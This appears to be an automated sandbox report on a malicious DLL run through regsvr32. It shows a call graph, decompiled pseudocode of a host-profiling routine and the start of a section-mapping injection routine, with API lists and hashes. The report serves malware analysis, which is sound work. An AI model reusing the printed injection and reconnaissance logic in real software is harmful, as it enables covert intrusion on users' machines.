11901 1000861a 2 API calls 11901->11881 11903 100051e2 11904 1000861a 2 API calls 11903->11904 11904->11906 11905 10009640 2 API calls 11907 100051ba 11905->11907 11906->11863 11908 100085d5 2 API calls 11907->11908 11909 100051c4 11908->11909 11910 1000a911 2 API calls 11909->11910 11911 100051d6 11910->11911 11912 1000861a 2 API calls 11911->11912 11912->11903 11914 1000a3ad 
11913->11914 11920 10005bb5 11913->11920 11915 1000861a 2 API calls 11914->11915 11918 1000a3d2 11914->11918 11915->11914 11916 1000861a 2 API calls 11917 1000a3dd 11916->11917 11919 1000861a 2 API calls 11917->11919 11918->11916 11919->11920 11920->11652 11922 100084ab HeapAlloc 11921->11922 11923 10001096 11922->11923 11924 1000a51a 11923->11924 11925 1000a538 11924->11925 11926 1001242d _ftol2_sse 11925->11926 11930 10005aa7 11925->11930 11927 1000a552 FindResourceA 11926->11927 11927->11925 11928 1000a580 11927->11928 11929 10008669 HeapAlloc 11928->11929 11928->11930 11929->11930 11930->11815 11932 1000891f 11931->11932 11938 10005ad4 11931->11938 11950 10008604 HeapAlloc 11932->11950 11934 10008929 11934->11938 11951 10008815 11934->11951 11937 1000861a 2 API calls 11937->11938 11938->11822 11939 1000a2e3 11938->11939 11986 10008a90 11939->11986 11943 1000a397 11943->11822 11944 1000a38f 12001 10008cc0 11944->12001 11947 1000a2fd 11947->11943 11947->11944 11948 10008698 3 API calls 11947->11948 11992 10009749 11947->11992 11997 100091a6 11947->11997 11948->11947 11950->11934 11961 10008604 HeapAlloc 11951->11961 11953 100088d6 11954 1000861a 2 API calls 11953->11954 11955 10008837 11953->11955 11954->11955 11955->11937 11955->11938 11956 1000882a 11956->11953 11956->11955 11962 1000ebf0 11956->11962 11959 100088f0 11960 1000861a 2 API calls 11959->11960 11960->11955 11961->11956 11977 10008604 HeapAlloc 11962->11977 11964 1000ec14 11965 1000ed7f 11964->11965 11978 10008604 HeapAlloc 11964->11978 11968 1000861a 2 API calls 11965->11968 11967 1000ec2c 11967->11965 11979 10008604 HeapAlloc 11967->11979 11969 1000eda5 11968->11969 11971 1000861a 2 API calls 11969->11971 11972 1000edb3 11971->11972 11973 100088cf 11972->11973 11974 1000861a 2 API calls 11972->11974 11973->11953 11973->11959 11974->11973 11975 1000ec42 11975->11965 11980 10008698 11975->11980 11977->11964 11978->11967 11979->11975 11985 10008604 HeapAlloc 11980->11985 11982 100086d5 11982->11975 
11983 100086ad 11983->11982 11984 1000861a 2 API calls 11983->11984 11984->11982 11985->11983 11987 10008ab3 11986->11987 11988 10008604 HeapAlloc 11987->11988 11989 10008be7 11987->11989 11990 1000861a 2 API calls 11987->11990 11988->11987 11991 10008604 HeapAlloc 11989->11991 11990->11987 11991->11947 11993 1000974b 11992->11993 11994 10009780 SetLastError 11993->11994 11995 1000978c SetLastError 11993->11995 11996 10009799 11994->11996 11995->11996 11996->11947 11999 100091b1 11997->11999 12000 100091c7 11997->12000 12013 10008604 HeapAlloc 11999->12013 12000->11947 12002 10008d57 12001->12002 12004 10008ccf 12001->12004 12002->11943 12003 10008d09 12005 10008d19 12003->12005 12014 10008de5 12003->12014 12004->12002 12004->12003 12006 1000861a 2 API calls 12004->12006 12008 10008d34 12005->12008 12009 1000861a 2 API calls 12005->12009 12006->12004 12010 10008d4a 12008->12010 12012 1000861a 2 API calls 12008->12012 12009->12008 12011 1000861a 2 API calls 12010->12011 12011->12002 12012->12010 12013->12000 12021 10008604 HeapAlloc 12014->12021 12016 10008e28 12016->12005 12017 10008e1e 12017->12016 12019 10008e61 12017->12019 12022 1000879d 12017->12022 12020 1000861a 2 API calls 12019->12020 12020->12016 12021->12017 12023 1001242d _ftol2_sse 12022->12023 12026 100087b6 12023->12026 12024 100087e3 12024->12019 12025 1001242d _ftol2_sse 12025->12026 12026->12024 12026->12025 12028 1000a485 12027->12028 12029 1000a495 GetLastError 12028->12029 12030 1000a48b GetLastError 12028->12030 12031 1000a4a2 12029->12031 12030->12031 12031->11839 12147 10008604 HeapAlloc 12032->12147 12034 10008990 12035 100089a1 lstrcpynW 12034->12035 12042 1000899a 12034->12042 12036 10008a14 12035->12036 12037 100089c4 12035->12037 12148 10008604 HeapAlloc 12036->12148 12039 1000a6a9 3 API calls 12037->12039 12041 100089d0 12039->12041 12040 10008a1f 12040->12042 12043 10008a39 12040->12043 12047 1000861a 2 API calls 12040->12047 12041->12043 12044 10008815 3 API calls 12041->12044 
12042->11857 12046 10008a61 12043->12046 12049 1000861a 2 API calls 12043->12049 12045 100089ea 12044->12045 12045->12040 12048 100089f0 12045->12048 12050 1000861a 2 API calls 12046->12050 12047->12043 12051 1000861a 2 API calls 12048->12051 12049->12046 12050->12042 12051->12042 12053 10004a41 12052->12053 12054 10004a76 12053->12054 12149 10002ba4 12053->12149 12055 1000b7a8 10 API calls 12054->12055 12066 10004ae2 12054->12066 12057 10004a8d 12055->12057 12058 1000b67d 4 API calls 12057->12058 12059 10004a9d 12058->12059 12165 100049c7 12059->12165 12061 10004aa7 12062 1000b88a 4 API calls 12061->12062 12063 10004acd 12062->12063 12176 10002c8f 12063->12176 12066->11906 12116 1000e2c6 12066->12116 12067 100092e5 2 API calls 12069 10004af8 12067->12069 12068 10004b5e 12070 10004b65 12068->12070 12071 10004bc6 12068->12071 12069->12068 12073 100095e1 HeapAlloc 12069->12073 12074 10004b4c 12069->12074 12245 1000c292 12070->12245 12075 100091e3 HeapAlloc 12071->12075 12077 10004b24 12073->12077 12074->12068 12238 1000e286 12074->12238 12079 10004bcf 12075->12079 12210 1000bfec 12077->12210 12081 100091e3 HeapAlloc 12079->12081 12082 10004bc2 12081->12082 12087 10009b43 8 API calls 12082->12087 12084 10004b99 12088 1000861a 2 API calls 12084->12088 12085 10004bae 12090 1000861a 2 API calls 12085->12090 12086 100085d5 2 API calls 12086->12074 12089 10004bfa 12087->12089 12088->12066 12089->12066 12254 10009f48 12089->12254 12090->12082 12093 10009f6c 4 API calls 12094 10004c1f 12093->12094 12095 1000a0ab 4 API calls 12094->12095 12096 10004c41 12095->12096 12097 10004c52 12096->12097 12258 1000a3ed 12096->12258 12099 10004c60 12097->12099 12101 1000a3ed 7 API calls 12097->12101 12100 1000980c GetSystemTimeAsFileTime 12099->12100 12102 10004c67 12100->12102 12101->12099 12103 1000a0ab 4 API calls 12102->12103 12106 10004c82 12103->12106 12104 10004cd8 12271 100052c0 12104->12271 12105 1000fc1f 8 API calls 12105->12106 12106->12104 12106->12105 12266 1000553f 
12106->12266 12110 10004d4d lstrcpyW 12110->12066 12111 10004d0e 12112 1000109a HeapAlloc 12111->12112 12113 10004d18 lstrcpyW 12112->12113 12114 100085d5 2 API calls 12113->12114 12115 10004d2f lstrcatW lstrcatW lstrcatW 12114->12115 12115->12066 12117 1000e2fa 12116->12117 12119 10004f40 12117->12119 12318 10008604 HeapAlloc 12117->12318 12319 10004905 12117->12319 12119->11868 12119->11870 12121->11884 12123 1000a943 12122->12123 12124 1000506e 12123->12124 12125 1000a98a GetExitCodeProcess 12123->12125 12124->11901 12125->12124 12127 1000fc43 12126->12127 12128 100050fa 12126->12128 12129 10008669 HeapAlloc 12127->12129 12128->11906 12136 10008604 HeapAlloc 12128->12136 12130 1000fc4d 12129->12130 12130->12128 12131 100060df 4 API calls 12130->12131 12135 1000fc8e 12130->12135 12133 1000fcac 12131->12133 12132 1000861a 2 API calls 12132->12128 12133->12135 12378 1000f7e3 12133->12378 12135->12132 12136->11888 12138 100060ea 12137->12138 12139 10005168 12137->12139 12413 10008604 HeapAlloc 12138->12413 12139->11903 12139->11905 12141 100060f4 12141->12139 12142 1000109a HeapAlloc 12141->12142 12143 1000610b 12142->12143 12144 100092e5 2 API calls 12143->12144 12145 1000612c 12144->12145 12146 100085d5 2 API calls 12145->12146 12146->12139 12147->12034 12148->12040 12150 10002bc0 12149->12150 12151 1000109a HeapAlloc 12150->12151 12164 10002c5c 12150->12164 12152 10002bd3 12151->12152 12153 100092e5 2 API calls 12152->12153 12154 10002be5 12153->12154 12155 100085d5 2 API calls 12154->12155 12156 10002bf0 12155->12156 12157 1000109a HeapAlloc 12156->12157 12158 10002bfa 12157->12158 12283 1000bf37 12158->12283 12161 100085d5 2 API calls 12162 10002c16 12161->12162 12163 1000861a 2 API calls 12162->12163 12163->12164 12164->12054 12166 10009256 2 API calls 12165->12166 12167 100049d2 12166->12167 12168 100095e1 HeapAlloc 12167->12168 12169 100049e1 12168->12169 12170 100092e5 2 API calls 12169->12170 12171 100049ed 12170->12171 12172 100085d5 2 API calls 
12171->12172 12173 100049f8 12172->12173 12174 1000861a 2 API calls 12173->12174 12175 10004a03 12174->12175 12175->12061 12290 1000b700 12176->12290 12178 10002ca8 12179 10002cb4 12178->12179 12180 10002d29 12178->12180 12181 1000109a HeapAlloc 12179->12181 12182 10002ba4 4 API calls 12180->12182 12183 10002cbe 12181->12183 12184 10002d3b 12182->12184 12189 10002ce8 12183->12189 12190 10002cdf 12183->12190 12185 10002d40 12184->12185 12186 10002d8a 12184->12186 12306 1000b012 memset memset 12185->12306 12187 10002c64 3 API calls 12186->12187 12198 10002d26 12187->12198 12194 1000109a HeapAlloc 12189->12194 12299 10002c64 12190->12299 12191 10002d4b 12193 1000109a HeapAlloc 12191->12193 12196 10002d55 12193->12196 12197 10002cf2 12194->12197 12195 10002ce4 12201 100085d5 2 API calls 12195->12201 12199 100092e5 2 API calls 12196->12199 12200 100092e5 2 API calls 12197->12200 12202 10002dc1 12198->12202 12203 10002d9f CreateDirectoryW 12198->12203 12204 10002d7a 12199->12204 12205 10002d0f 12200->12205 12201->12198 12202->12066 12202->12067 12207 10002dab 12203->12207 12208 100085d5 2 API calls 12204->12208 12206 100085d5 2 API calls 12205->12206 12206->12195 12207->12202 12209 1000861a 2 API calls 12207->12209 12208->12198 12209->12202 12211 1000c00b 12210->12211 12213 10004b42 12210->12213 12212 100095e1 HeapAlloc 12211->12212 12211->12213 12216 1000c054 12212->12216 12213->12086 12214 1000c0f2 12215 100085d5 2 API calls 12214->12215 12215->12213 12216->12214 12311 10008604 HeapAlloc 12216->12311 12218 1000c0e8 12218->12214 12219 1000c0f9 12218->12219 12220 100095e1 HeapAlloc 12219->12220 12221 1000c103 12220->12221 12222 10009640 2 API calls 12221->12222 12223 1000c11b 12222->12223 12224 1000c1ab 12223->12224 12225 1000c170 12223->12225 12226 1000c131 12223->12226 12228 1000861a 2 API calls 12224->12228 12229 10009640 2 API calls 12225->12229 12227 10009640 2 API calls 12226->12227 12230 1000c149 12227->12230 12231 1000c1d1 12228->12231 12232 1000c16b 12229->12232 
12233 10009640 2 API calls 12230->12233 12234 100085d5 2 API calls 12231->12234 12237 1000a911 2 API calls 12232->12237 12233->12232 12235 1000c1da 12234->12235 12236 100085d5 2 API calls 12235->12236 12236->12213 12237->12224 12239 100095e1 HeapAlloc 12238->12239 12240 1000e29c 12239->12240 12241 1000bfec 6 API calls 12240->12241 12242 1000e2b4 12241->12242 12243 100085d5 2 API calls 12242->12243 12244 1000e2bd 12243->12244 12244->12068 12246 1000a86d 5 API calls 12245->12246 12247 1000c2a4 12246->12247 12248 100095c7 HeapAlloc 12247->12248 12249 1000c2ae 12248->12249 12250 10009292 2 API calls 12249->12250 12251 1000c2bd 12250->12251 12252 100085c2 2 API calls 12251->12252 12253 10004b6e 12252->12253 12253->12084 12253->12085 12255 10009f55 12254->12255 12255->12255 12256 1000a0ab 4 API calls 12255->12256 12257 10004c16 12256->12257 12257->12093 12259 1000a46a 12258->12259 12263 1000a400 12258->12263 12259->12097 12261 10009749 2 API calls 12261->12263 12262 1000a424 GetLastError 12262->12263 12263->12259 12263->12261 12263->12262 12264 1000a0ab 4 API calls 12263->12264 12265 10009f48 4 API calls 12263->12265 12312 10009ed0 12263->12312 12264->12263 12265->12263 12270 10005564 12266->12270 12267 10005626 12267->12106 12268 1000a6a9 3 API calls 12268->12270 12269 1000861a 2 API calls 12269->12270 12270->12267 12270->12268 12270->12269 12272 100052d6 12271->12272 12273 100052ef 12271->12273 12317 10008604 HeapAlloc 12272->12317 12275 10008698 3 API calls 12273->12275 12276 100052e0 12275->12276 12277 1000b88a 4 API calls 12276->12277 12282 10004cf8 12276->12282 12278 10005344 12277->12278 12279 100122d3 _ftol2_sse 12278->12279 12280 10005377 12279->12280 12281 1000902d _ftol2_sse 12280->12281 12281->12282 12282->12066 12282->12110 12282->12111 12284 1000bf64 12283->12284 12287 10002c08 12284->12287 12289 10008604 HeapAlloc 12284->12289 12286 1000bf94 12286->12287 12288 1000861a 2 API calls 12286->12288 12287->12161 12288->12287 12289->12286 12291 100095c7 HeapAlloc 
12290->12291 12292 1000b71a 12291->12292 12293 1001242d _ftol2_sse 12292->12293 12296 1000b74f 12293->12296 12294 1000b793 12295 100085c2 2 API calls 12294->12295 12297 1000b7a1 12295->12297 12296->12294 12298 1001242d _ftol2_sse 12296->12298 12297->12178 12298->12296 12300 1000109a HeapAlloc 12299->12300 12301 10002c73 12300->12301 12302 100091e3 HeapAlloc 12301->12302 12303 10002c7d 12302->12303 12304 100085d5 2 API calls 12303->12304 12305 10002c88 12304->12305 12305->12195 12307 1000b062 12306->12307 12308 1000b946 5 API calls 12307->12308 12309 1000b067 12308->12309 12310 1000b0c5 lstrcpynW 12309->12310 12310->12191 12311->12218 12313 10009f95 3 API calls 12312->12313 12314 10009ee9 12313->12314 12315 10009eff 12314->12315 12316 1000861a 2 API calls 12314->12316 12315->12263 12316->12315 12317->12276 12318->12117 12320 10004928 12319->12320 12321 10004995 12320->12321 12322 10004a0b 37 API calls 12320->12322 12321->12117 12324 10004948 12322->12324 12323 10004986 12337 100047ca 12323->12337 12324->12321 12324->12323 12327 1000ad44 12324->12327 12328 1000ad65 12327->12328 12333 1000ad5e 12327->12333 12329 1000ad71 GetLastError 12328->12329 12330 1000ad79 12328->12330 12329->12333 12331 1000b998 6 API calls 12330->12331 12332 1000ad8b 12331->12332 12332->12333 12334 1000adea 12332->12334 12335 1000ada2 memset 12332->12335 12333->12324 12336 1000861a 2 API calls 12334->12336 12335->12334 12336->12333 12338 100060df 4 API calls 12337->12338 12339 100047ef 12338->12339 12340 100047fb 12339->12340 12341 1000109a HeapAlloc 12339->12341 12340->12321 12342 1000481a 12341->12342 12343 100092e5 2 API calls 12342->12343 12344 1000482c 12343->12344 12345 100085d5 2 API calls 12344->12345 12346 1000483a 12345->12346 12347 10002ba4 4 API calls 12346->12347 12348 1000484c 12347->12348 12363 100048d8 12348->12363 12364 10006144 12348->12364 12350 1000861a 2 API calls 12351 100048e5 12350->12351 12353 1000861a 2 API calls 12351->12353 12353->12340 12354 100095e1 HeapAlloc 12355 
10004878 12354->12355 12356 100092e5 2 API calls 12355->12356 12357 1000488f 12356->12357 12358 100085d5 2 API calls 12357->12358 12359 1000489d 12358->12359 12360 100048be 12359->12360 12362 10006144 7 API calls 12359->12362 12361 1000861a 2 API calls 12360->12361 12361->12363 12362->12360 12363->12350 12373 10008604 HeapAlloc 12364->12373 12366 10006154 12367 1000902d _ftol2_sse 12366->12367 12372 10004869 12366->12372 12368 1000617c 12367->12368 12374 1000c263 12368->12374 12371 1000861a 2 API calls 12371->12372 12372->12354 12372->12363 12373->12366 12375 1000c274 12374->12375 12376 1000bfec 6 API calls 12375->12376 12377 1000618b 12376->12377 12377->12371 12379 1000f883 12378->12379 12380 1000f7fe 12378->12380 12382 1000109a HeapAlloc 12379->12382 12381 1000109a HeapAlloc 12380->12381 12383 1000f809 12381->12383 12384 1000f88d 12382->12384 12406 10008604 HeapAlloc 12383->12406 12386 10006144 7 API calls 12384->12386 12387 1000f89e 12386->12387 12390 100085d5 2 API calls 12387->12390 12388 1000f817 12389 1001242d _ftol2_sse 12388->12389 12391 1000f833 12389->12391 12392 1000f8a9 12390->12392 12393 10009640 2 API calls 12391->12393 12394 1000f8b5 12392->12394 12396 1000f9bf 4 API calls 12392->12396 12395 1000f845 12393->12395 12398 1000861a 2 API calls 12394->12398 12397 1000a911 2 API calls 12395->12397 12396->12394 12399 1000f855 12397->12399 12405 1000f87e 12398->12405 12400 100085d5 2 API calls 12399->12400 12401 1000f868 12400->12401 12407 10009f2f 12401->12407 12404 1000861a 2 API calls 12404->12405 12405->12135 12406->12388 12410 10009f06 12407->12410 12411 1000a0ab 4 API calls 12410->12411 12412 10009f2a 12411->12412 12412->12404 12413->12141 12438 10008604 HeapAlloc 12414->12438 12416 100061ef 12417 10006360 12416->12417 12439 10008604 HeapAlloc 12416->12439 12417->11659 12419 1000626f 12420 1000861a 2 API calls 12419->12420 12421 10006352 12420->12421 12422 1000861a 2 API calls 12421->12422 12422->12417 12423 1000628d memset memset 12424 10006209 

                  Executed Functions

                  C-Code - Quality: 91%
                  			E1000D01F(void* __fp0) {
                  				long _v8;
                  				long _v12;
                  				union _SID_NAME_USE _v16;
                  				struct _SYSTEM_INFO _v52;
                  				char _v180;
                  				short _v692;
                  				char _v704;
                  				char _v2680;
                  				void* __esi;
                  				struct _OSVERSIONINFOA* _t81;
                  				intOrPtr _t83;
                  				void* _t84;
                  				long _t86;
                  				void** _t88;
                  				intOrPtr _t90;
                  				intOrPtr _t91;
                  				intOrPtr _t92;
                  				intOrPtr _t97;
                  				void* _t98;
                  				intOrPtr _t103;
                  				char* _t105;
                  				void* _t108;
                  				intOrPtr _t111;
                  				long _t115;
                  				signed int _t117;
                  				long _t119;
                  				intOrPtr _t124;
                  				intOrPtr _t127;
                  				intOrPtr _t130;
                  				intOrPtr _t134;
                  				intOrPtr _t145;
                  				intOrPtr _t147;
                  				intOrPtr _t149;
                  				intOrPtr _t152;
                  				intOrPtr _t154;
                  				signed int _t159;
                  				struct HINSTANCE__* _t162;
                  				short* _t164;
                  				intOrPtr _t167;
                  				WCHAR* _t168;
                  				char* _t169;
                  				intOrPtr _t181;
                  				intOrPtr _t200;
                  				void* _t215;
                  				long _t218;
                  				void* _t219;
                  				char* _t220;
                  				struct _OSVERSIONINFOA* _t222;
                  				void* _t223;
                  				int* _t224;
                  				void* _t241;
                  
                  				_t241 = __fp0;
                  				_t162 =  *0x1001e69c; // 0x10000000
                  				_t81 = E10008604(0x1ac4);
                  				_t222 = _t81;
                  				if(_t222 == 0) {
                  					return _t81;
                  				}
                  				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
                  				_t83 =  *0x1001e684; // 0x2c2faa0
                  				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
                  				_t3 = _t222 + 0x648; // 0x648
                  				E10012301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
                  				_t5 = _t222 + 0x1644; // 0x1644
                  				_t216 = _t5;
                  				_t86 = GetModuleFileNameW(0, _t5, 0x105);
                  				_t227 = _t86;
                  				if(_t86 != 0) {
                  					 *((intOrPtr*)(_t222 + 0x1854)) = E10008FBE(_t216, _t227);
                  				}
                  				GetCurrentProcess();
                  				_t88 = E1000BA05(); // executed
                  				 *(_t222 + 0x110) = _t88;
                  				_t178 =  *_t88;
                  				if(E1000BB8D( *_t88) == 0) {
                  					_t90 = E1000BA62(_t178, _t222); // executed
                  					__eflags = _t90;
                  					_t181 = (0 | _t90 > 0x00000000) + 1;
                  					__eflags = _t181;
                  					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
                  				} else {
                  					 *((intOrPtr*)(_t222 + 0x214)) = 3;
                  				}
                  				_t12 = _t222 + 0x220; // 0x220, executed
                  				_t91 = E1000E3F1(_t12); // executed
                  				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
                  				_t92 = E1000E3B6(_t12); // executed
                  				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
                  				 *(_t222 + 0x224) = _t162;
                  				_v12 = 0x80;
                  				_v8 = 0x100;
                  				_t22 = _t222 + 0x114; // 0x114
                  				if(LookupAccountSidW(0,  *( *(_t222 + 0x110)), _t22,  &_v12,  &_v692,  &_v8,  &_v16) == 0) {
                  					GetLastError();
                  				}
                  				_t97 =  *0x1001e694; // 0x2c2fbf8
                  				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
                  				_t26 = _t222 + 0x228; // 0x228
                  				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
                  				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
                  				GetLastError();
                  				_t31 = _t222 + 0x228; // 0x228
                  				 *((intOrPtr*)(_t222 + 0x434)) = E10008FBE(_t31, _t98);
                  				_t34 = _t222 + 0x114; // 0x114, executed
                  				_t103 = E1000B7A8(_t34,  &_v692);
                  				_t35 = _t222 + 0xb0; // 0xb0
                  				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
                  				_push(_t35);
                  				E1000B67D(_t103, _t35, _t98, _t241);
                  				_t37 = _t222 + 0xb0; // 0xb0
                  				_t105 = _t37;
                  				_t38 = _t222 + 0xd0; // 0xd0
                  				_t164 = _t38;
                  				if(_t105 != 0) {
                  					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
                  					if(_t159 > 0) {
                  						_t164[_t159] = 0;
                  					}
                  				}
                  				_t41 = _t222 + 0x438; // 0x438
                  				_t42 = _t222 + 0x228; // 0x228
                  				E10008FD8(_t42, _t41);
                  				_t43 = _t222 + 0xb0; // 0xb0
                  				_t108 = E1000D400(_t43, E1000C379(_t43), 0);
                  				_t44 = _t222 + 0x100c; // 0x100c
                  				E1000B88A(_t108, _t44, _t241);
                  				_t199 = GetCurrentProcess(); // executed
                  				_t111 = E1000BBDF(_t110); // executed
                  				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
                  				memset(_t222, 0, 0x9c);
                  				_t224 = _t223 + 0xc;
                  				_t222->dwOSVersionInfoSize = 0x9c;
                  				GetVersionExA(_t222);
                  				_t167 =  *0x1001e684; // 0x2c2faa0
                  				_t115 = 0;
                  				_v8 = 0;
                  				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
                  					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
                  					_t115 = _v8;
                  				}
                  				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
                  				if(_t115 == 0) {
                  					GetSystemInfo( &_v52);
                  					_t117 = _v52.dwOemId & 0x0000ffff;
                  				} else {
                  					_t117 = 9;
                  				}
                  				_t54 = _t222 + 0x1020; // 0x1020
                  				_t168 = _t54;
                  				 *(_t222 + 0x9c) = _t117;
                  				GetWindowsDirectoryW(_t168, 0x104);
                  				_t119 = E100095E1(_t199, 0x10c);
                  				_t200 =  *0x1001e684; // 0x2c2faa0
                  				_t218 = _t119;
                  				 *_t224 = 0x104;
                  				_push( &_v704);
                  				_push(_t218);
                  				_v8 = _t218;
                  				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
                  					_t154 =  *0x1001e684; // 0x2c2faa0
                  					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
                  				}
                  				E100085D5( &_v8);
                  				_t124 =  *0x1001e684; // 0x2c2faa0
                  				_t61 = _t222 + 0x1434; // 0x1434
                  				_t219 = _t61;
                  				 *_t224 = 0x209;
                  				_push(_t219);
                  				_push(L"USERPROFILE");
                  				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
                  					E10009640(_t219, 0x105, L"%s\\%s", _t168);
                  					_t152 =  *0x1001e684; // 0x2c2faa0
                  					_t224 =  &(_t224[5]);
                  					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
                  				}
                  				_push(0x20a);
                  				_t64 = _t222 + 0x122a; // 0x122a
                  				_t169 = L"TEMP";
                  				_t127 =  *0x1001e684; // 0x2c2faa0
                  				_push(_t169);
                  				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
                  					_t149 =  *0x1001e684; // 0x2c2faa0
                  					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
                  				}
                  				_push(0x40);
                  				_t220 = L"SystemDrive";
                  				_push( &_v180);
                  				_t130 =  *0x1001e684; // 0x2c2faa0
                  				_push(_t220);
                  				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
                  					_t147 =  *0x1001e684; // 0x2c2faa0
                  					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
                  				}
                  				_v8 = 0x7f;
                  				_t72 = _t222 + 0x199c; // 0x199c
                  				_t134 =  *0x1001e684; // 0x2c2faa0
                  				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
                  				_t75 = _t222 + 0x100c; // 0x100c
                  				E10012301(E1000D400(_t75, E1000C379(_t75), 0),  &_v2680);
                  				_t76 = _t222 + 0x1858; // 0x1858
                  				E100122D3( &_v2680, _t76, 0x20);
                  				_t79 = _t222 + 0x1878; // 0x1878
                  				E1000902D(1, _t79, 0x14, 0x1e,  &_v2680);
                  				_t145 = E1000CD33(_t79); // executed
                  				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
                  				return _t222;
                  			}























































                  APIs
                    • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                  • GetCurrentProcessId.KERNEL32 ref: 1000D046
                  • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D082
                  • GetCurrentProcess.KERNEL32 ref: 1000D09F
                  • LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 1000D131
                  • GetLastError.KERNEL32 ref: 1000D13E
                  • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D16C
                  • GetLastError.KERNEL32 ref: 1000D172
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D1C7
                  • GetCurrentProcess.KERNEL32 ref: 1000D20E
                    • Part of subcall function 1000BA62: CloseHandle.KERNEL32(?,00000000,74EC17D9,10000000), ref: 1000BB06
                  • memset.MSVCRT ref: 1000D229
                  • GetVersionExA.KERNEL32(00000000), ref: 1000D234
                  • GetCurrentProcess.KERNEL32(00000100), ref: 1000D24E
                  • IsWow64Process.KERNEL32(00000000), ref: 1000D251
                  • GetSystemInfo.KERNEL32(?), ref: 1000D26A
                  • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D287
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: Process$Current$ErrorFileLastModuleName$AccountAllocByteCharCloseDirectoryHandleHeapInfoLookupMultiSystemVersionWideWindowsWow64memset
                  • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                  • API String ID: 2155830292-2706916422
                  • Opcode ID: b5dd94d2bbba0da44d3b5b8615bbbb5f356fccea26f3f649cc03eb97a5baf4da
                  • Instruction ID: b43297c2b7e84521e640d7514395b2e770dddaaf3bf4c430bd1fb4440b0adffa
                  • Opcode Fuzzy Hash: b5dd94d2bbba0da44d3b5b8615bbbb5f356fccea26f3f649cc03eb97a5baf4da
                  • Instruction Fuzzy Hash: 7AB14875600709ABE714EB70CC89FEE77E8EF18380F01486EF55AD7195EB70AA448B21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 86%
                  			E1000C6C0(void* __ecx, intOrPtr __edx) {
                  				void* _v8;
                  				void* _v12;
                  				void* _v16;
                  				void* _v20;
                  				long _v24;
                  				long _v28;
                  				void* _v32;
                  				intOrPtr _v36;
                  				long _v40;
                  				void* _v44;
                  				char _v56;
                  				char _v72;
                  				struct _WNDCLASSEXA _v120;
                  				void* _t69;
                  				intOrPtr _t75;
                  				struct HWND__* _t106;
                  				intOrPtr* _t113;
                  				struct _EXCEPTION_RECORD _t116;
                  				void* _t126;
                  				void* _t131;
                  				intOrPtr _t134;
                  				void* _t140;
                  				void* _t141;
                  
                  				_t69 =  *0x1001e688; // 0x2bb0590
                  				_t126 = __ecx;
                  				_t134 = __edx;
                  				_t116 = 0;
                  				_v36 = __edx;
                  				_v16 = 0;
                  				_v44 = 0;
                  				_v40 = 0;
                  				_v12 = 0;
                  				_v8 = 0;
                  				_v24 = 0;
                  				_v20 = __ecx;
                  				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
                  					E1000E23E(0x1f4);
                  					_t116 = 0;
                  				}
                  				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                  				_v28 = _t116;
                  				if( *_t113 != 0x4550) {
                  					L12:
                  					if(_v8 != 0) {
                  						_t75 =  *0x1001e780; // 0x2c2fbc8
                  						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
                  						_v8 = _v8 & 0x00000000;
                  					}
                  					L14:
                  					if(_v12 != 0) {
                  						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
                  					}
                  					if(_v16 != 0) {
                  						NtClose(_v16);
                  					}
                  					return _v8;
                  				}
                  				_v44 =  *((intOrPtr*)(_t113 + 0x50));
                  				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
                  					goto L12;
                  				}
                  				_v120.style = 0xb;
                  				_v120.cbSize = 0x30;
                  				_v120.lpszClassName =  &_v56;
                  				asm("movsd");
                  				_v120.lpfnWndProc = DefWindowProcA;
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsb");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsw");
                  				asm("movsb");
